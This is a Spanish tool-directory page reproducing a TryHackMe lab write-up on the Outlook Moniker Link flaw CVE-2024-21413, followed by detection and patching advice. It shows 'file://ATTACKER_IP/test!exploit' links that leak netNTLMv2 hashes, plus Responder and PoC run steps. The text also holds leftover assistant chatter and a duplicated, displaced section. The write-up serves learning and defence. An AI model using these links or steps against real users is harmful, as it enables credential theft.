Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook- — El 13 de febrero de 2024, Microsoft publicó una grave vulnerabilidad de seguridad en Microsoft Outlook, identificada como CVE-2024-21413, conocida como Moniker Link Vulnerability. La vulnerabilidad permite a un atacante eludir el mecanismo Protected View de Outlook. | Kitploit
Herramientas/GitHubGitHub/eylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónSeguridad de Correo ElectrónicoLabs y Práctica
GitHubeylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

El 13 de febrero de 2024, Microsoft publicó una grave vulnerabilidad de seguridad en Microsoft Outlook, identificada como CVE-2024-21413, conocida como Moniker Link Vulnerability. La vulnerabilidad permite a un atacante eludir el mecanismo Protected View de Outlook.

Ver Repositorio
8hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

El 13 de febrero de 2024, Microsoft publicó una grave vulnerabilidad de seguridad en Microsoft Outlook, identificada como CVE-2024-21413 y conocida como Moniker Link Vulnerability. La vulnerabilidad permite a un atacante eludir el mecanismo Protected View de Outlook. image

Excelente 👍 A continuación se presenta una traducción completa redactada como informe de Penetration Testing (PT), en español profesional y claro. Como solicitaste – solo traducción y redacción. Las respuestas, capturas y detalles los agregarás tú; si lo deseas más adelante, te ayudaré.


Informe de Penetration Testing

CVE-2024-21413 – Moniker Link (Microsoft Outlook)


🧩 Resumen Ejecutivo (Executive Summary)

El 13 de febrero de 2024, Microsoft publicó una grave vulnerabilidad de seguridad en Microsoft Outlook, identificada como CVE-2024-21413 y conocida como Moniker Link Vulnerability.

La vulnerabilidad permite a un atacante eludir el mecanismo Protected View de Outlook mediante un enlace especial (Moniker Link), haciendo que el cliente Outlook de la víctima a un servidor controlado por el atacante – sin ejecutar ningún archivo ni mostrar una advertencia de seguridad efectiva.

envíe sus credenciales de inicio de sesión (hash NTLM)

La vulnerabilidad puede conllevar a una filtración de credenciales e incluso existe la posibilidad teórica de ejecución remota de código (RCE).


📌 Detalles de la vulnerabilidad

ParámetroValor
IdentificadorCVE-2024-21413
Fecha de publicación13 de febrero de 2024
DescubridorHaifei Li – Check Point Research
ImpactoFiltración de credenciales + posible RCE
GravedadCrítica
Complejidad de ataqueBaja
Puntuación CVSS9.8
Enlace oficialhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413

🎯 Versiones afectadas

La vulnerabilidad afecta a las siguientes versiones:

  • Microsoft Office LTSC 2021 – desde versión 19.0.0
  • Microsoft 365 Apps for Enterprise – desde versión 16.0.1
  • Microsoft Office 2019 – desde versión 16.0.1
  • Microsoft Office 2016 – antes de la versión 16.0.5435.1001

🎓 Objetivos de aprendizaje (Learning Objectives)

  • Comprender el funcionamiento de la vulnerabilidad
  • Conocer el mecanismo Protected View de Outlook
  • Explotar la vulnerabilidad para filtrar credenciales
  • Medidas de detección (Detection)
  • Recomendaciones de mitigación (Mitigation)

(Descripción de la vulnerabilidad)

image

Microsoft Outlook permite mostrar correos electrónicos en formato HTML y analizar enlaces de diversos tipos, como http:// y https://. Además, Outlook también es compatible con enlaces especiales llamados Moniker Links, que permiten ejecutar aplicaciones o acceder a recursos externos del sistema operativo.

En condiciones normales, cuando un correo contiene un enlace que ejecuta una aplicación externa o accede a un recurso del sistema (como un enlace file://), se activa el mecanismo de seguridad Protected View de Outlook. Este mecanismo muestra una advertencia de seguridad y bloquea acciones peligrosas como la ejecución de código, macros o el acceso a recursos de red externos.

Sin embargo, se descubrió una vulnerabilidad en Outlook (CVE-2024-21413) que permite eludir el mecanismo Protected View mediante una simple manipulación de un enlace de tipo Moniker Link.

Hallazgos (Findings)

Durante la prueba se descubrió que el uso de un enlace normal del tipo:

file://ATTACKER_IP/test

hace que Outlook intente acceder a un recurso de red mediante el protocolo SMB, pero este intento es bloqueado por Protected View.

En cambio, cuando el enlace incluye el carácter especial ! y una cadena de texto adicional, por ejemplo:

file://ATTACKER_IP/test!exploit

Outlook no activa Protected View y realiza un intento de conexión al servidor remoto.

Durante este intento:

  • Outlook intenta acceder al recurso a través de SMB
  • Se realiza una solicitud de autenticación automática
  • Las credenciales de inicio de sesión del usuario se envían al atacante
  • Se captura el hash netNTLMv2 de Windows de la víctima

Es importante señalar que el recurso compartido remoto no tiene por qué existir realmente, ya que el intento de autenticación se realiza de todos modos.

Impacto (Impact)

La vulnerabilidad permite al atacante:

  • Filtrar credenciales de usuario (hash netNTLMv2)
  • Realizar ataques offline (Cracking / Pass-the-Hash)
  • Movimiento lateral en la red corporativa

Además, dado que Moniker Links utiliza el mecanismo COM (Component Object Model) de Windows, existe la posibilidad teórica de ejecución remota de código (RCE). Sin embargo, hasta la fecha de la prueba, no existe un Proof of Concept público que demuestre RCE real mediante esta vulnerabilidad.

Explotación de la vulnerabilidad (Exploitation)

En el marco del ataque, se envía a la víctima un correo que contiene un Moniker Link similar al mostrado en la tarea anterior. El objetivo del atacante es crear un correo con un enlace Moniker Link que eluda el mecanismo Protected View de Outlook, de modo que cuando la víctima haga clic en el enlace, su cliente Outlook intente cargar un archivo desde la máquina del atacante. Esta acción provoca que el hash netNTLMv2 de la víctima se envíe y sea capturado por el atacante.

Antes de realizar el ataque, revisaremos un Proof of Concept (PoC) creado con fines de demostración (y también disponible en GitHub).

Autor: CMNatic | https://github.com/cmnatic Versión: 1.0 | 19/02/2024

El código utiliza el lenguaje Python y envía un correo HTML que contiene un enlace Moniker Link malicioso.

Descripción del PoC

El PoC:

  • Recibe una dirección de correo del atacante y una dirección de correo de la víctima
  • Solicita una contraseña para autenticación SMTP (En esta sala, la contraseña para [email protected] es: attacker)
  • Contiene el contenido HTML del correo (html_content) con un enlace Moniker Link malicioso
  • Define los campos del correo: Asunto, De, Para
  • Envía el correo a través del servidor de correo

En un escenario real, se necesita un servidor SMTP controlado por el atacante (en esta sala, el servidor ya está proporcionado).

Escucha para capturar el hash – Responder

Después de enviar el correo, se debe ejecutar una herramienta de escucha como Responder en la máquina del atacante para capturar solicitudes SMB.

En THM AttackBox, el nombre de la interfaz es ens5:

root@kitploit:~
responder -I ens5

Responder escucha solicitudes SMB, LLMNR y NBT-NS y permite capturar credenciales de autenticación.

Apertura de la máquina de la víctima

  • Abrir la máquina de la víctima a través de la ventana de split-screen
  • Iniciar Outlook
  • Seleccionar la opción "I don't want to sign in or create an account"
  • Cerrar la ventana de ingreso de clave de producto
  • La bandeja de entrada de la víctima ya está configurada previamente

Ejecución del Exploit

En AttackBox:

  • Crear un nuevo archivo llamado exploit.py
  • Pegar el código del PoC

Antes de ejecutar, realizar los siguientes ajustes:

  • Actualizar la dirección IP de la máquina del atacante dentro del Moniker Link (línea 12)
  • Reemplazar el valor MAILSERVER por la dirección:
root@kitploit:~
10.64.165.67

Luego ejecutar:

root@kitploit:~
python3 exploit.py

Cuando se solicite la contraseña, introducir:

root@kitploit:~
attacker

Si la operación fue exitosa, se recibirá el mensaje:

root@kitploit:~
Email delivered

Resultado

Después de abrir el correo en la máquina de la víctima y hacer clic en el enlace "Click me":

  • Outlook intenta conectarse a la máquina del atacante a través de SMB
  • Responder captura el intento de autenticación
  • Se captura con éxito el hash netNTLMv2 del usuario

El ataque se ha completado con éxito.

image

Detección (Detection)

YARA

Se creó una regla YARA por Florian Roth cuyo objetivo es identificar correos que contengan el elemento file:\\ dentro de un Moniker Link – algo que podría indicar un intento de explotación de CVE-2024-21413.

Ejemplo de la regla YARA (tal como aparece en la sala):

La regla busca características generales de un correo (como Subject: y Received:) y además busca un patrón sospechoso de enlace file:// que apunte a una ruta UNC (\\) junto con una extensión de archivo común, incluyendo el carácter ! al final (característica de la evasión de Protected View).

(El código en sí se mantiene tal como aparece en el original)

Wireshark

Además, se puede observar la solicitud SMB que sale de la máquina de la víctima hacia la máquina del atacante en una captura de paquetes (Packet Capture) en Wireshark.

Durante la solicitud:

  • Se realiza un intento de autenticación SMB
  • Se puede identificar un hash de tipo netNTLMv2 (a veces de forma truncada)

Mitigación (Remediation)

Microsoft incluyó actualizaciones de seguridad para corregir esta vulnerabilidad en el marco de las actualizaciones Patch Tuesday de febrero. Se puede consultar la lista de artículos KB relevantes según la versión de Office en el enlace oficial de Microsoft.

Se recomienda encarecidamente actualizar Microsoft Office mediante:

  • Windows Update
  • Microsoft Update Catalog

Además, hasta que se completen las actualizaciones en todos los sistemas, esto sirve como un recordatorio importante para aplicar prácticas básicas de seguridad de la información, y en particular para aumentar la concienciación de los usuarios, como:

  • No hacer clic en enlaces aleatorios, especialmente de correos inesperados
  • Previsualizar los enlaces antes de hacer clic
  • Reenviar correos sospechosos al responsable de seguridad de la información de la organización

Dado que esta vulnerabilidad elude el mecanismo Protected View de Outlook, no es posible configurar Outlook para bloquear este ataque únicamente mediante cambios de configuración.

Asimismo, bloquear completamente el protocolo SMB no se recomienda en la mayoría de las organizaciones, ya que el protocolo es esencial para acceder a recursos de red y archivos compartidos. Sin embargo, es posible implementar bloqueos o restricciones a nivel de firewall, según la política organizacional y la estructura de la red.

Mitigación (Remediation)

Microsoft incluyó parches de seguridad para esta vulnerabilidad en el marco de las actualizaciones Patch Tuesday de febrero. Se puede consultar la lista de artículos KB relevantes según la versión de Office en el enlace oficial de Microsoft. Se recomienda encarecidamente actualizar Microsoft Office mediante:

  • Windows Update
  • Microsoft Update Catalog

Además, hasta que se implementen las actualizaciones en todos los sistemas, esto sirve como un recordatorio importante para aplicar prácticas básicas de seguridad de la información, y en particular para aumentar la concienciación de los usuarios, como:

  • Evitar hacer clic en enlaces aleatorios, especialmente de correos inesperados
  • Verificar la dirección del enlace (Preview) antes de hacer clic
  • Reenviar correos sospechosos al responsable de seguridad de la información de la organización

Dado que esta vulnerabilidad elude el mecanismo Protected View de Outlook, no es posible prevenir el ataque mediante cambios de configuración dentro del propio Outlook.

Asimismo, el bloqueo completo del protocolo SMB no se recomienda en la mayoría de las organizaciones, ya que el protocolo es esencial para acceder a archivos compartidos y recursos de red. Sin embargo, es posible implementar restricciones o bloqueos a nivel de firewall, según la política de seguridad y la estructura de la red corporativa.

Descargar herramienta